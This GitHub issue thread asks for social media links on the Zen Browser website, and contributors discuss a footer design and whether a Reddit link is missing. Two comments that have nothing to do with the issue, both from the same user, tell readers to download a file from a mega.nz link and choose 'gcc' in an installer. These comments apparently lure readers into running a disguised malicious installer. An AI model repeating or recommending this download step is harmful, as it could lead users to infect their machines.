### ISSUE TITLE
Social Media Links

### ISSUE THREAD

**Issue by burnout426** [zen-browser/www#94]
It would be nice if the https://www.zen-browser.app/ page listed social media links like https://fosstodon.org/@zenbrowser and 
https://reddit.com/r/zen_browser/ in the "Useful links" section.

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by lawlesx** [comment]
Do you have any specific design in mind or shall I add it in the Use full link section on the navbar and in the footer?

**Comment by burnout426** [comment]
No design in mind. I think in the Useful link section would be fine.

**Comment by GabsEdits** [comment]
I would suggest something like this for the footer:

<img width="832" alt="zen-browser-footer" src="https://github.com/user-attachments/assets/a1bac592-cb2e-48f6-8674-0251e50826bd">

I used the [Fonts Awesome](https://fontawesome.com/icons) in the example above, which can be easily added with an `import` in CSS

**Comment by lawlesx** [comment]
Ok will create something like this

**Comment by mauro-balades** [comment]
Now fixed

**Comment by burnout426** [comment]
I don't see a Reddit link though. Is that intentional?
